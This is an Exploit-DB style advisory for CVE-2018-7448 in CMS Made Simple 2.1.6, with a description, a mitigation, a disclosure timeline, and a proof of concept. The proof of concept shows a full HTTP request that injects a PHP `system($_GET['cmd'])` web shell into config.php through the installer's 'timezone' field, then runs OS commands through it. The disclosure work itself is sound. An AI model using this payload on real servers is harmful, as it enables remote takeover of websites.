CMS Made Simple 2.1.6 - Remote Code Execution

vendor:

CMS Made Simple

by:

Keerati T.

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: CMS Made Simple

Affected Version From: 2.1.6

Affected Version To: 2.1.6

Patch Exists: YES

Related CWE: CVE-2018-7448

CPE: 2.1.6

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2018

CMS Made Simple 2.1.6 – Remote Code Execution

Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.

Mitigation:

Ensure that the web server is configured to deny write access to the configuration file, and that the configuration file is not accessible from the web.

Source

Exploit-DB raw data:

# Exploit Title: CMS Made Simple 2.1.6 - Remote Code Execution
# Date: 2018-02-26
# Exploit Author: Keerati T.
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/13570/cmsms-2.
1.6-install.zip
# Version: 2.1.6
# CVE: CVE-2018-7448
# Tested on: Linux

1.Description
Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.

2.Proof of Concept
- Access to "http://target/path/cmsms-2.1.6-install.php" for installing CMS Made Simple
- Proceed to step 4 of installation which is database setup stage, enter a valid database credentials and modifying "timezone" parameter on intercepted proxy as following:

==========
POST /cms/cmsms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP/1.1
Host: 192.168.5.196
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php?mdf68c24c=4
Cookie: CMSICc861538bbb=i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

dbhost=localhost&dbname=cms&dbuser=xvwa&dbpass=xvwa&
timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92
==========

- Forward tampered "timezone" parameter packet and proceed to next step until successfully installation.
- Execute OS command via "config.php" by requesting " http://target/path/config.php?cmd=id;uname"

3.Timeline
2017-04-14 Vulnerability report
2017-04-15 Vendor inform that will be fixed on next full release
2017-06-10 Version 2.2 release and vulnerability fixed
2018-02-23 CVE assigned
2018-02-26 Public